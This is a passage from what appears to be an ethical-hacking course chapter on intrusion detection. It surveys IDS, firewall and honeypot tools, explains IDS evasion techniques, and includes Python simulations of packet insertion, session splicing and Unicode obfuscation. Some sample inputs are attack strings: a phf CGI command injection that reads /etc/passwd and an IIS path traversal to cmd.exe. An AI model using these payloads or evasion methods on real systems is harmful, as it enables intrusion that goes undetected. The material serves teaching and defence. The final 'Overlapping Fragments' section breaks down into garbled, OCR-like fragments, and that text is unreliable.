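def parse_addrs(spec: str) -> Callable[[str], bool]:
    """'any', one CIDR/IP, or a [a,b,...] list, with a leading '!' for negation."""
    negate = spec.startswith("!")
    spec = spec[1:] if negate else spec
    if spec == "any":
        nets = [ipaddress.ip_network("0.0.0.0/0")]
    else:
        nets = [ipaddress.ip_network(s.strip(), strict=False)
                for s in spec.strip("[]").split(",")]
    return lambda ip: any(ipaddress.ip_address(ip) in n for n in nets) != negate


@dataclass
class RuleHeader:
    action: str
    proto: str
    src: Callable[[str], bool]
    sport: Callable[[int], bool]
    direction: str
    dst: Callable[[str], bool]
    dport: Callable[[int], bool]
    text: str


def parse_header(rule: str) -> RuleHeader:
    """Cut the option section off at the first '(' and parse the seven header fields."""
    fields = rule.split("(", 1)[0].split()
    if len(fields) != 7:
        raise ValueError("rule header must have exactly 7 fields: %r" % rule)
    action, proto, src, sport, direction, dst, dport = fields
    if action not in ACTIONS or proto not in PROTOCOLS or direction not in ("->", "<>"):
        raise ValueError("bad action/protocol/direction in %r" % rule)
    return RuleHeader(action, proto, parse_addrs(src), parse_ports(sport),
                      direction, parse_addrs(dst), parse_ports(dport), rule)


def matches(rule: RuleHeader, proto: str, sip: str, sport: int, dip: str, dport: int) -> bool:
    """True if the packet 5-tuple satisfies the header; '<>' accepts both orientations."""
    if rule.proto != "ip" and rule.proto != proto:   # the 'ip' keyword matches any IP protocol
        return False
    forward = rule.src(sip) and rule.sport(sport) and rule.dst(dip) and rule.dport(dport)
    if rule.direction == "->":
        return forward
    reverse = rule.src(dip) and rule.sport(dport) and rule.dst(sip) and rule.dport(sport)
    return forward or reverse


def first_action(rules, proto, sip, sport, dip, dport):
    """Action of the first rule whose header matches, or None (option checks omitted)."""
    for r in rules:
        if matches(r, proto, sip, sport, dip, dport):
            return r.action
    return None


# The rules discussed in the text; the alert rule's option part is skipped, not evaluated.
RULES = [parse_header(r) for r in (
    'alert tcp !192.168.1.0/24 any -> 192.168.1.0/24 111 (content: "|00 01 86 a5|"; msg: "external mountd access";)',
    "log tcp !192.168.1.0/24 any <> 192.168.1.0/24 23",
    "log udp any any -> 192.168.1.0/24 1:1024",
    "log tcp any any -> 192.168.1.0/24 :5000",
    "log tcp any :1024 -> 192.168.1.0/24 400:",
    "log tcp any any -> 192.168.1.0/24 !6000:6010",
)]

if __name__ == "__main__":
    # constructed packet: external host 10.9.8.7 talking to the portmapper on 192.168.1.5
    print(first_action(RULES, "tcp", "10.9.8.7", 40000, "192.168.1.5", 111))
```

Note that Snort itself does not simply take the first matching rule in file order; it evaluates pass, drop, alert, and log rules in a configurable order. `first_action` is only a convenience for checking how each header alone classifies a packet.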
Suricata

Source: https://suricata-ids.org

Suricata is a robust network threat detection engine capable of real-time intrusion detection (IDS), inline intrusion prevention (IPS), network security monitoring (NSM), and offline pcap processing. It inspects network traffic using powerful and extensive rules and a signature language, and it provides Lua scripting support for the detection of complex threats. With standard input and output formats such as YAML (configuration) and JSON (event output), integration with existing tools such as SIEMs, Splunk, Logstash/Elasticsearch, Kibana, and other databases becomes effortless.

Figure 12.21: Screenshot of TippingPoint
AlienVault® OSSIM™

Source: https://www.alienvault.com

AlienVault® OSSIM™, Open Source Security Information and Event Management (SIEM), provides you with a feature-rich open-source SIEM complete with event collection, normalization, and correlation. OSSIM provides a unified platform with many essential security capabilities, such as:

- Asset discovery
- Behavioral monitoring
- Vulnerability assessment
- Intrusion detection
- SIEM event correlation

Some additional intrusion detection tools are listed below:

- SolarWinds Security Event Manager (https://www.solarwinds.com)
- OSSEC (https://www.ossec.net)
- Bro IDS/Zeek IDS (https://www.zeek.org)
Intrusion Detection Tools for Mobile Devices

(Slide: zIPS, Wifi Inspector, Wifi Intruder Detect)

Figure 12.23: Screenshot of zIPS

Wifi Inspector

Source: https://play.google.com
Wifi Inspector allows you to find all the devices connected to the network (via both wired and Wi-Fi connections, including consoles, TVs, PCs, tablets, and phones); it gives relevant data such as the IP addresses, manufacturer names, device names, and MAC addresses of connected devices. It also allows you to save a list of known devices with a custom name and find intruders in a short period.

Figure 12.24: Screenshot of Wifi Inspector
Wifi Intruder Detect

Source: https://wifi-intruder-detect.en.aptoide.com

Wifi Intruder Detect helps to find security leaks in the Wi-Fi network Internet connection. It allows you to detect an intruder who is accessing the network, Wi-Fi, or Internet connection without your consent.
Intrusion Prevention Tools (slide)

(AlienVault® Unified Security Management® (USM), IBM Security Network Intrusion Prevention System, Cyberoam Intrusion Prevention System, McAfee Host Intrusion Prevention, Cisco Intrusion Prevention Systems, Check Point IPS Software Blade)
Intrusion Prevention Tools

AlienVault® Unified Security Management® (USM)

Source: https://www.alienvault.com

AlienVault USM can perform threat detection, incident response, and compliance management across cloud, on-premises, and hybrid environments. It can be integrated with AlienVault Open Threat Exchange (OTX), which is an open threat intelligence community with more than 100,000 participants who contribute over 19 million threat indicators daily to protect the network from intrusions.

Figure 12.26: Screenshot of AlienVault USM

Some additional intrusion prevention tools are listed below:

- IBM Security Network Intrusion Prevention System (https://www.ibm.com)
- Cyberoam Intrusion Prevention System (https://www.cyberoam.com)
- McAfee Host Intrusion Prevention for Desktops (https://www.mcafee.com)
- Cisco Intrusion Prevention Systems (https://www.cisco.com)
- Check Point IPS Software Blade (https://www.checkpoint.com)
Firewalls: ZoneAlarm Free Firewall 2019 and ManageEngine Firewall Analyzer (slide)
Firewalls

Firewalls provide essential protection to computers against viruses, privacy threats, objectionable content, hackers, and malicious software when connected to the Internet. A firewall filters inbound and outbound traffic according to a policy; a personal firewall additionally monitors the running applications that access the network. Some products also analyze downloads, raise an alert when a malicious file is being downloaded, and stop it from infecting the PC.

ZoneAlarm Free Firewall 2019

Source: https://www.zonealarm.com

ZoneAlarm Free Firewall 2019 prevents attackers and intruders from accessing your system. It manages and monitors all incoming and outgoing traffic and shields the network from hackers, malware, and other online threats that may compromise network privacy. It monitors programs for suspicious behavior, spotting and stopping new attacks that bypass traditional anti-virus protection. Moreover, it prevents identity theft by guarding your data. It also erases your tracks, allowing you to surf the web in complete privacy. Furthermore, it locks out attackers, blocks intrusions, and makes your PC invisible online. In addition, it filters out annoying and potentially dangerous emails.

Features:

- Two-way firewall that monitors and blocks inbound as well as outbound traffic
- Allows users to browse the web privately using the Full Stealth Mode
- Identity protection services help to prevent identity theft by guarding crucial data of the users; it also offers PC protection and data encryption
- Public network protection and wireless network protection are other key features of this firewall
- Provides quick security updates in real time

Figure 12.27: Screenshot of ZoneAlarm PRO FIREWALL 2017

ManageEngine Firewall Analyzer

Source: https://www.manageengine.com
ManageEngine Firewall Analyzer is an agent-less log analytics and configuration management software that helps network administrators to understand how the bandwidth is being used in their network. ManageEngine Firewall Analyzer is vendor-agnostic and supports nearly all open-source and commercial network firewalls, such as Check Point, Cisco, Fortinet, Juniper, and Palo Alto.

Features:

- Compliance Management
- Change Management
- User Internet Activity Monitoring
- Network Traffic and Bandwidth Monitoring
- Firewall Policy Management
- Real-time VPN and Proxy Server Monitoring
- Network Security Management
- Network Forensic Audits
- Log Analysis

(Screenshot: Firewall Traffic Statistics, listing received traffic per device, e.g., Cisco PIX and Palo Alto)
Some additional firewall solutions are listed below:

- pfSense (https://www.pfsense.org)
- Sophos XG Firewall (https://www.sophos.com)
- Comodo Firewall (https://personalfirewall.comodo.com)
- Palo Alto Networks WildFire (https://www.paloaltonetworks.com)
Firewalls for Mobile Devices

The firewalls discussed previously are used for securing personal computers and networks. Similarly, some firewalls can secure mobile devices.

Mobiwol: NoRoot Firewall

Source: http://www.mobiwol.com

Mobiwol NoRoot Firewall helps to take control of mobile apps: it allows or blocks app connectivity and blocks background app activity. It generates alerts when new apps access the Internet.

Features:

- Launches automatically on device startup
- Automatically identifies the applications currently installed on your mobile device
- Identifies and notifies when newly installed apps access the web
- Sets allow/block on a per-application basis
- Disables background activity for selected apps

Figure 12.28: Screenshot of Mobiwol: NoRoot Firewall
Mobile Privacy Shield

Source: https://shieldapps.com

Mobile Privacy Shield is an application for people on the move, i.e., people who store necessary information on their smartphones and use their devices for banking, shopping, business, and more. Mobile Privacy Shield's Privacy Advisor monitors application permissions, sorting them into three categories by privacy-risk level. Each report is packed with detailed information, and a response is suggested per case. Mobile Privacy Shield centralizes all permissions, allowing you to review and assess their validity and need conveniently. It also allows you to remove each threat from within the interface.

Figure 12.29: Screenshot of Mobile Privacy Shield
NetPatch Firewall

Source: https://firewall.netpatch.co

NetPatch Firewall is a full-featured advanced Android no-root firewall. It can be used to fully control a mobile device's network. Using NetPatch Firewall, you can create network rules based on apps, IP addresses, domain names, etc. This firewall is designed to reduce a mobile device's network traffic and battery consumption, improve network security, and ensure privacy.

Features:

- Block network access per app, by screen on/off, by Wi-Fi/mobile (3G & 4G), and block roaming
- Shadowsocks proxy support (a TCP and UDP secure proxy, presented as a better VPN proxy)
- Custom DNS: change your DNS server, support DNS queries through the Shadowsocks proxy, and set the DNS cache time
- Notify when new apps are installed
- Export/import configuration

Figure 12.30: Screenshot of NetPatch Firewall
Honeypot Tools: KFSensor and SPECTER

Honeypot Tools

Honeypots are security tools that allow the security community to monitor attackers' tricks and exploits by logging all their activity, so that it can respond quickly to such exploits before the attacker can misuse or compromise the system.

KFSensor

Source: http://www.keyfocus.net

KFSensor is a host-based IDS that acts as a honeypot to attract and detect hackers and worms by simulating vulnerable system services and Trojans. By acting as a decoy server, it can divert attacks from critical systems and provide a higher level of information than that achieved using firewalls and NIDS alone.

You can use KFSensor in a Windows-based corporate environment. It includes many innovative and unique features such as remote management, a Snort-compatible signature engine, and emulations of Windows networking protocols.
Figure 12.32: Screenshot of KFSensor

SPECTER

Source: http://www.specter.com
SPECTER is a honeypot or deception system. It simulates a complete system and provides an appealing target to lure hackers away from production systems. It offers typical Internet services such as SMTP, FTP, POP3, HTTP, and TELNET, which appear perfectly normal to attackers. However, it traps attackers by tricking them into leaving traces that show that they had connected to a decoy system, which does none of the things it appears to do but instead logs everything and notifies the appropriate people. Furthermore, SPECTER automatically investigates attackers while they are still trying to break in. It provides massive amounts of decoy content and generates decoy programs that do not leave traces on the attacker's computer. Automated weekly online updates of the honeypot's content and vulnerability databases allow the honeypot to change regularly without user interaction.
Figure 12.33: Screenshot of SPECTER

Some additional honeypot tools are listed below:

- HoneyBOT (https://www.atomicsoftwaresolutions.com)
- MongoDB-HoneyProxy (https://github.com)
- Modern Honey Network (https://github.com)
- Honeyd (http://www.honeyd.org)
Module Flow: Evading IDS

The previous sections helped us to understand IDS and IPS, their roles and functions, how they protect your network from intruders, and the various IDS solutions available. Even though an IDS thwarts attempts to breach network security, attackers can still evade it. This section explains various ways in which attackers evade IDS.
IDS Evasion Techniques (slide: Insertion Attack, Evasion, Denial-of-Service Attack, Obfuscating, False Positive Generation, Session Splicing, Unicode Evasion, Fragmentation Attack, Overlapping Fragments, Time-To-Live Attacks, Invalid RST Packets, Urgency Flag, Polymorphic Shellcode, ASCII Shellcode, Application-Layer Attacks, Desynchronization, Encryption, Flooding)
IDS Evasion Techniques

IDS that provide an extra layer of security to the organization's infrastructure are interesting targets for attackers. Attackers implement various IDS evasion techniques to bypass such security mechanisms and compromise the infrastructure. IDS evasion is the process of modifying attacks to fool the IDS/IPS into interpreting the traffic as legitimate and thus prevent the IDS from triggering an alert. Many IDS evasion techniques can perform IDS evasion in different and effective ways:

- Insertion Attack
- Evasion
- Denial-of-Service Attack
- Obfuscating
- False Positive Generation
- Session Splicing
- Unicode Evasion
- Fragmentation Attack
- Overlapping Fragments
- Time-To-Live Attacks
- Invalid RST Packets
- Urgency Flag
- Polymorphic Shellcode
- ASCII Shellcode
- Application-Layer Attacks
- Desynchronization
- Encryption
- Flooding
Insertion Attack (slide): the attacker confuses the IDS by forcing it to read packets that the end system rejects, so the IDS and the end host reconstruct different data streams.
Insertion Attack

Insertion is the process by which the attacker confuses the IDS by forcing it to read invalid packets (i.e., packets that the end system addressed will not accept). An IDS blindly trusts and accepts a packet that an end system rejects. If a packet is malformed or if it does not reach its actual destination, the packet is invalid; if the IDS reads an invalid packet, it gets confused. An attacker exploits this condition and inserts data into the IDS. This attack occurs when the NIDS is less strict in processing packets than the internal network. The attacker obscures the real traffic with extra packets, and the IDS concludes that the traffic is harmless. Hence, the IDS gets more packets than the destination.

To understand how insertion becomes a problem for a network IDS, it is important to understand how the IDS detects attacks. It employs pattern-matching algorithms to look for specific patterns of data in a packet or stream of packets. For example, it might search for the string "phf" in an HTTP request to discover a PHF Common Gateway Interface (CGI) attack. An attacker who can insert packets into the IDS can prevent pattern matching from working. For instance, an attacker can send the string "phf" to a web server, attempting to exploit the CGI vulnerability, but force the IDS to read "phoneyf" (by "inserting" the string "oney") instead.

A straightforward insertion attack involves intentionally corrupting the IP header checksum. Every packet transmitted on an IP network has a checksum that allows corrupted headers to be detected. IP checksums are 16-bit numbers computed over the fields of the IP header. If the checksum on an IP packet does not match the actual header, the addressed host will not accept the packet, while an IDS that does not verify checksums might consider it part of the effective stream.

As a second example, the attacker can send packets whose time-to-live (TTL) fields are crafted to re
ach the IDS but not the target computers. This will result in the IDS and the target system having two different character strings. An attacker confronts the IDS with a stream of one-character packets (the attacker-originated data stream), in which one of the characters (the letter "X") will be accepted only by the IDS. As a result, the IDS and the end system reconstruct two different strings.

Figure 12.34: Evading IDS using an insertion attack (the monitor accepts the inserted letter "X"; the end system does not)
Evasion

In this technique, an end system accepts a packet that an IDS rejects. Using this technique, an attacker exploits the host computer without the IDS ever realizing it. The attacker sends portions of the request in packets that the IDS mistakenly rejects, allowing parts of the request to be removed from the IDS's view byte by byte: a byte is sent in a packet that the IDS discards but the end system accepts, so the IDS cannot detect the attack because it never sees the complete request.

Figure 12.35: Illustration of the evasion technique (the end system accepts the letter that the monitor discards)
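The following simulation, added here and not part of the course material, reproduces both the insertion attack from the previous section (the "phoneyf" example, once with a corrupted IP header checksum and once with a short TTL) and the evasion attack from this section on constructed IPv4 headers. The 2-hop and 4-hop distances, the private addresses, and the assumption that a naive monitor neither verifies the header checksum nor accepts packets carrying IP options are illustrative choices, not the observed behaviour of any product.

```python
"""Insertion and evasion simulated on constructed IPv4 packets.

Added example (not from the course). The attacker sends a stream of small packets;
the NIDS sits 2 router hops from the attacker, the target host 4 hops away.
Nothing is sent on a network: the path is modelled by decrementing TTL once per
hop. That a naive monitor skips IP checksum verification and discards packets
carrying IP options is the hypothetical IDS weakness being illustrated."""
import struct
from dataclasses import dataclass


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum of the header's 16-bit words."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(ttl: int, payload_len: int, corrupt: bool = False, options: bytes = b"") -> bytes:
    """IPv4 header with constructed private addresses; options are padded to a 4-byte multiple."""
    options += b"\x00" * (-len(options) % 4)
    ihl = 5 + len(options) // 4
    src, dst = bytes([10, 0, 0, 1]), bytes([192, 168, 1, 7])
    fixed = struct.pack("!BBHHHBBH4s4s", 0x40 | ihl, 0, ihl * 4 + payload_len,
                        0x1234, 0x4000, ttl, 6, 0, src, dst)
    csum = ipv4_checksum(fixed + options)
    if corrupt:
        csum ^= 0x0001                  # one flipped bit: the end host must discard this packet
    return fixed[:10] + struct.pack("!H", csum) + fixed[12:] + options


def checksum_valid(header: bytes) -> bool:
    """A correct header, summed including its own checksum field, folds to zero."""
    return ipv4_checksum(header) == 0


@dataclass
class Packet:
    header: bytes
    payload: bytes

    @property
    def ttl(self) -> int:
        return self.header[8]

    @property
    def has_options(self) -> bool:
        return (self.header[0] & 0x0F) > 5


def craft(payload: bytes, ttl: int = 64, corrupt: bool = False, options: bytes = b"") -> Packet:
    return Packet(build_ipv4_header(ttl, len(payload), corrupt, options), payload)


def reconstruct(packets, hops: int, verify_checksum: bool, accept_options: bool) -> bytes:
    """Byte stream as seen by a node `hops` routers away from the attacker."""
    out = bytearray()
    for p in packets:
        if p.ttl <= hops:                       # TTL reaches 0 at a router before this node
            continue
        if verify_checksum and not checksum_valid(p.header):
            continue
        if p.has_options and not accept_options:
            continue
        out += p.payload
    return bytes(out)


# Insertion: the "oney" packet is meant for the IDS only, via a bad checksum or a short TTL.
CHECKSUM_INSERTION = [craft(b"ph"), craft(b"oney", corrupt=True), craft(b"f")]
TTL_INSERTION = [craft(b"ph"), craft(b"oney", ttl=3), craft(b"f")]
# Evasion: the "f" packet carries four NOP IP options (0x01) that the naive monitor drops.
EVASION = [craft(b"ph"), craft(b"f", options=b"\x01\x01\x01\x01")]


def naive_ids_view(packets) -> bytes:
    return reconstruct(packets, hops=2, verify_checksum=False, accept_options=False)


def checking_ids_view(packets) -> bytes:
    return reconstruct(packets, hops=2, verify_checksum=True, accept_options=True)


def host_view(packets) -> bytes:
    return reconstruct(packets, hops=4, verify_checksum=True, accept_options=True)


if __name__ == "__main__":
    for name, stream in [("checksum insertion", CHECKSUM_INSERTION),
                         ("TTL insertion", TTL_INSERTION), ("evasion", EVASION)]:
        print(name, naive_ids_view(stream), checking_ids_view(stream), host_view(stream))
```

The checking monitor fixes the checksum and option cases but is still fooled by the TTL variant, because the packet is perfectly valid when it passes the sensor; defeating that one requires the sensor to know the hop count to each protected host (or a normalizer that rewrites TTLs), which is the point the next sections on fragmentation and TTL attacks build on.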
Denial-of-Service Attack (DoS)

Many IDS use a centralized server for logging alerts. If the attackers know the IP address of the centralized server, they can perform DoS or other attacks to slow down or crash the server. As a result, the attackers' intrusion attempts will not be logged. Using this technique, an attacker causes more alarms than can be handled by the management system, such as its database.

Multiple types of DoS attack will work against an IDS. The attacker identifies a point of network processing that requires the allocation of a resource and causes a condition in which all of that resource is consumed. The resources affected by the attacker are CPU cycles, memory, disk space, and network bandwidth. Attackers monitor and attack the CPU capabilities of the IDS. This is because the IDS needs CPU time to read the packets, decode them, and compare them with its saved network state. An attacker can identify the most computationally expensive network processing operations and then compel the IDS to spend all its time carrying out useless work.

An IDS requires memory for a variety of tasks, such as generating a match for the patterns, saving the TCP connections, maintaining reassembly queues, and producing buffers for the data. In the initial phase, the system requires memory to read the packets. The system will allocate the memory for network processing operations. An attacker can identify the processing operations that require the IDS to allocate memory and force the IDS to assign all of its memory to meaningless information.

The IDS, unlike an end system, must read everyone's packets, not just those explicitly sent to it. An attacker can overload the network with meaningless information and prevent the IDS from keeping up with what is happening on the network.

Many IDS today employ central logging servers that are used exclusively to store IDS alert logs. The central server's function is to centralize alert data so that it is viewed as a whole rather than on a system-by-system basis. However, if attackers know the central log server's IP address, they could slow it down or even crash it using a DoS attack. After shutting down the server, attacks could go unnoticed because the alert data is no longer logged.

Using this evasion technique, an attacker:

- Causes personnel to be unable to investigate all the alarms
- Causes more alarms than can be handled by management systems (such as databases, etc.)
- Fills up disk space, preventing attacks from being logged
- Consumes the device's processing power and allows attacks to sneak by
Obfuscating

Obfuscation means to make code more difficult to understand or read, generally for privacy or security purposes. A tool called an obfuscator converts a straightforward program into one that works in the same way but which is much more difficult to understand.

Obfuscating is an IDS evasion technique used by attackers to encode the attack packet payload in such a way that the destination host can decode the packet but the IDS cannot. An attacker manipulates the path referenced in the signature to fool the HIDS. Using Unicode characters, an attacker can encode attack packets that the IDS would not recognize but which an IIS web server can decode. Polymorphic code is another means to circumvent signature-based IDS: it creates different attack patterns for the same attack, so no single signature matches every instance.
False Positive Generation

Attackers with knowledge of the target IDS craft malicious packets just to generate alerts; the attacks can then bypass the IDS unnoticed, as it is difficult to differentiate the attack traffic from the large volume of false positives.

This mode does not attack the target; instead, it does something relatively ordinary. In this mode, the IDS generates an alarm when no condition is present to warrant one. Another attack, similar to the DoS method, is to create a significant amount of alert data that the IDS will log. Attackers construct malicious packets known to trigger alerts within the IDS, forcing it to generate a large number of false reports. Such an attack creates a large amount of log "noise" in an attempt to blend real attacks with fake ones. Attackers know all too well that when looking at log data, it can be challenging to differentiate between legitimate attacks and false positives. If attackers know the IDS, they can even generate false positives specific to that IDS. Attackers then use these false positive alerts to hide real attack traffic and bypass the IDS unnoticed.
Session Splicing

Session splicing is an IDS evasion technique that exploits how some IDS do not reconstruct sessions before pattern-matching the data. It is a network-level evasion method used to bypass IDS where an attacker splits the attack traffic into an excessive number of packets such that no single packet triggers the IDS. The attacker divides the data into small portions of a few bytes per packet and evades the string match while still delivering the data. An IDS that cannot handle an excessive number of small packets fails to detect the attack signatures. This approach is effective against IDS that do not reconstruct the stream before checking it against intrusion signatures. If attackers know what IDS is in use and are aware of its reassembly timeout, they can additionally add delays between packet transmissions to bypass reassembly.

Many IDS reassemble communication streams; hence, if a packet is not received within a reasonable period, many IDS stop reassembling and handling that stream. If the application under attack keeps a session active for longer than the IDS spends reassembling it, the IDS will stop. As a result, any data in the session after the IDS stops reassembling it will be susceptible to malicious use by attackers. The IDS will not log any attack attempt after a successful splicing attack. Attackers can use tools such as Nessus for session-splicing attacks.
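As an added illustration (not the course's code), the toy matcher below shows why splicing defeats per-packet matching, and why an IDS reassembly timeout shorter than the gap between segments defeats stream matching as well. The request line, the signature, and the timings are constructed.

```python
"""Session splicing: per-packet matching vs. stream reassembly with a timeout.

Added example (not the course's code; the request line and signature are
constructed). A per-packet matcher sees single TCP segments; the toy StreamIDS
appends in-order segments to a buffer and matches on the buffer, but abandons the
stream when the gap between segments exceeds its reassembly timeout."""
SIGNATURE = b"/cgi-bin/phf"
REQUEST = b"GET /cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd HTTP/1.0\r\n\r\n"


def splice(payload: bytes, chunk: int):
    """Split the payload into (sequence offset, data) TCP segments of `chunk` bytes."""
    return [(i, payload[i:i + chunk]) for i in range(0, len(payload), chunk)]


def per_packet_match(segments, signature: bytes = SIGNATURE) -> bool:
    """A matcher with no reassembly: the signature must lie inside one segment."""
    return any(signature in data for _, data in segments)


class StreamIDS:
    """Reassembles a single in-order TCP stream; gives up after `timeout` idle seconds."""

    def __init__(self, timeout: float, signature: bytes = SIGNATURE):
        self.timeout = timeout
        self.signature = signature
        self.buffer = bytearray()
        self.next_seq = 0
        self.last_seen = None
        self.alerts = 0

    def receive(self, seq: int, data: bytes, now: float) -> bool:
        if self.last_seen is not None and now - self.last_seen > self.timeout:
            self.buffer = bytearray()       # stream state discarded: reassembly restarts here
            self.next_seq = seq
        self.last_seen = now
        if seq == self.next_seq:            # in-order delivery only, for brevity
            self.buffer += data
            self.next_seq += len(data)
        hit = self.signature in self.buffer
        self.alerts += int(hit)
        return hit


def run(chunk: int, gap: float, ids_timeout: float):
    """Return (per-packet matcher alerted?, stream IDS alerted?) for one spliced request."""
    segments = splice(REQUEST, chunk)
    ids = StreamIDS(ids_timeout)
    stream_hit = False
    for n, (seq, data) in enumerate(segments):
        stream_hit = ids.receive(seq, data, now=n * gap) or stream_hit
    return per_packet_match(segments), stream_hit


if __name__ == "__main__":
    print("one segment:        ", run(chunk=len(REQUEST), gap=0, ids_timeout=30))
    print("1-byte splicing:    ", run(chunk=1, gap=0, ids_timeout=30))
    print("splicing + 60s gaps:", run(chunk=1, gap=60, ids_timeout=30))
```

The third case is the one the text describes: the web server keeps the connection open across the 60 s gaps and eventually receives the whole request, while the sensor, whose reassembly timeout is 30 s, never holds more than one byte at a time.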
Unicode Evasion Technique

Unicode is a character coding system that supports the encoding, processing, and display of written texts for all languages, maintaining a consistent representation in a computer. Several standards, such as Java, LDAP, and XML, require Unicode, and many OS and applications support it. Attackers can implement an attack using different character encodings of the "code points" in the Unicode code space. The most commonly used character encodings are Unicode Transformation Format (UTF)-8 and UTF-16.

For example, in the %u (UTF-16 code unit) encoding accepted by IIS, "/" can be represented as "%u2215" (U+2215, the division slash, which the server folds to an ordinary slash) and "é" as "%u00e9"; in UTF-8, "©" can be represented as "%c2%a9" and "≠" as "%e2%89%a0".

Problems with Unicode: the same character has several interpretations and encodings, so a signature that matches only one spelling misses the others. Taking this as an advantage, attackers can convert attack strings to Unicode characters to avoid pattern and signature matching at the IDS.
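The decoder below, added here and neither the course's nor IIS's code, undoes the encodings discussed in this section and in the Obfuscating section above (%uXXXX, percent/UTF-8, double encoding, overlong UTF-8, and best-fit folding of U+2215) before matching a signature, which is what an IDS's HTTP normalizer has to do. The overlong-UTF-8 handling and the two-entry best-fit table are assumptions about what a permissive server accepts; all sample paths are constructed.

```python
"""Undoing the encodings used to hide a URL signature: %uXXXX, percent/UTF-8,
double encoding, overlong UTF-8 and Windows "best-fit" folding.

Added example, not the course's or any vendor's code. The lenient decoding of
overlong 2-byte UTF-8 (e.g. %c0%af for "/") and the two-entry best-fit table are
assumptions about a permissive server; a real normalizer mirrors its target."""
import re
from urllib.parse import unquote_to_bytes

BEST_FIT = {0x2215: "/", 0x2216: "\\"}           # DIVISION SLASH, SET MINUS (assumed subset)
U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")  # 2-byte forms that strict UTF-8 rejects


def decode_u(path: str) -> str:
    """IIS-style %uXXXX escapes: one UTF-16 code unit per escape (lone surrogates -> U+FFFD)."""
    def one(m):
        cp = int(m.group(1), 16)
        return "\ufffd" if 0xD800 <= cp <= 0xDFFF else chr(cp)
    return U_ESCAPE.sub(one, path)


def decode_utf8_lenient(raw: bytes) -> str:
    """Accept overlong 2-byte encodings (lead byte C0/C1) the way a permissive decoder does."""
    raw = OVERLONG.sub(lambda m: bytes([((m.group(0)[0] & 0x1F) << 6) | (m.group(0)[1] & 0x3F)]), raw)
    return raw.decode("utf-8", errors="replace")


def normalize(path: str, passes: int = 3) -> str:
    """Repeat decoding until the path is stable (handles double encoding such as %2568)."""
    for _ in range(passes):
        before = path
        path = decode_u(path)
        path = decode_utf8_lenient(unquote_to_bytes(path))
        path = "".join(BEST_FIT.get(ord(c), c) for c in path)
        path = path.replace("\\", "/")
        if path == before:
            break
    return path


def naive_match(path: str, signature: str) -> bool:
    return signature in path


def normalized_match(path: str, signature: str) -> bool:
    return signature in normalize(path)


SAMPLES = [                                    # constructed request paths
    "/cgi-bin/phf",
    "/cgi-bin%u2215phf",                       # %u encoding of U+2215, best-fit to "/"
    "/cgi-bin/p%68f",                          # plain percent encoding of "h"
    "/cgi-bin/p%2568f",                        # double encoding
    "/scripts/..%c0%af../winnt/system32/cmd.exe",   # overlong UTF-8 for "/"
]

if __name__ == "__main__":
    for s in SAMPLES:
        print("%-45s naive=%-5s normalized=%-5s -> %s" % (
            s, naive_match(s, "/cgi-bin/phf"), normalized_match(s, "/cgi-bin/phf"), normalize(s)))
```

Normalizing too aggressively creates the opposite problem: a sensor that decodes overlong sequences the target server rejects will raise alerts the server never saw. The decoding policy has to match the server being protected, which is why Snort's http_inspect preprocessor, for instance, exposes these decodings as per-server options.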
Fragmentation Attack (slide): fragmentation can be used as an attack vector when the fragment reassembly timeout differs between the IDS and the host. If the IDS timeout is 10 s and the host timeout is 20 s, attackers send the second fragment 15 s after the first; the IDS drops the fragments, whereas the target system reassembles them, and the attacker continues with 15 s delays until the whole attack payload is reassembled at the target. A similar fragmentation attack works when the IDS timeout exceeds that of the victim.
Fragmentation Attack

IP packets must respect the Maximum Transmission Unit (MTU) of the links they travel across. If the packet size exceeds the MTU, the packet is split into multiple fragments ("fragmentation"). The IP header of each fragment carries a fragment ID, fragment offset, fragment length, and fragmentation flags in addition to its share of the original data. In a network, the flow of packets is irregular; hence, systems need to keep fragments around, wait for future fragments, and then reassemble them in order. Fragmentation can be used as an attack vector when fragmentation timeouts vary between the IDS and the host. Through the process of fragmenting and reassembling, attackers can send malicious packets over the network to exploit and attack systems. To avoid detection by an IDS, attackers may exploit the fragment reassembly timeout, which varies from system to system.

Attack Scenario 1

If, for example, the fragment reassembly timeout is 10 s at the IDS and 20 s at the target system, attackers will send the second fragment 15 s after sending the first fragment. In this scenario, the IDS will drop the fragments on receiving the second fragment after its reassembly timeout, but the target host will reassemble the fragments. Attackers will continue sending fragments with intervals of 15 s until the attack payload is reassembled at the target system. Thus, the victim will reassemble the fragments and receive the attack code, whereas the IDS will not detect this or generate alerts, as the IDS drops the fragments.

Figure 12.36: Fragmentation attack scenarios (IDS frag_timeout = 10 s, target frag_timeout = 20 s, waiting time between fragments = 15 s)

The figure above illustrates the discussed scenario (Attack Scenario 1). The attacker successfully performs a fragmentation attack on a host by manipulating the order and timing of the fragments sent to the victim machine. The attack succeeds when the NIDS fragmentation reassembly timeout is less than the victim's fragmentation reassembly timeout.
Attack Scenario 2

A similar fragmentation attack works when the IDS timeout exceeds that of the victim. Sometimes, the IDS fragmentation reassembly timeout is greater than that of a host. In this scenario, consider that the attacker has fragmented the attack packet into four fragments: frag-1, frag-2, frag-3, and frag-4. Here, the IDS fragmentation reassembly timeout is 60 s, and the fragmentation reassembly timeout for the host is 30 s.

Initially, the attacker sends frag-2 and frag-4 with a false payload, referred to as frag-2' and frag-4', which are received by both the IDS and the victim. The attacker waits until the fragment reassembly timeout occurs at the victim's system. Because the victim has not received frag-1, it drops the fragments without generating an ICMP error message. The attacker then sends frag-1 and frag-3 with a legitimate payload. Now, the victim has only frag-1 and frag-3, whereas the IDS has frag-1, frag-2', frag-3, and frag-4', where frag-2' and frag-4' have false payloads. With the four received fragments, the IDS will perform a reassembly but drop the packet, as the computed checksum over the reassembled data containing frag-2' and frag-4' will be invalid. If the attacker now sends frag-2 and frag-4 again with a valid payload, the IDS will hold only these two fragments, as the previous fragments will already have been reassembled and dropped. The victim will have all fragments (frag-1, frag-3, frag-2, frag-4) with valid payloads, reassemble them, and read the packet as valid.
Overlapping
Fragments
Forexpe tel rpmentconti of100byte ofpond with sequence umber; thesecond agent com
of
SernOS
i origina
with
whesven
een
ae the
tate h esubsequentWindows
agment
fapment oi e fg
set
leo
eg,
05)
W2K#/2003]
and some operating
a o
&
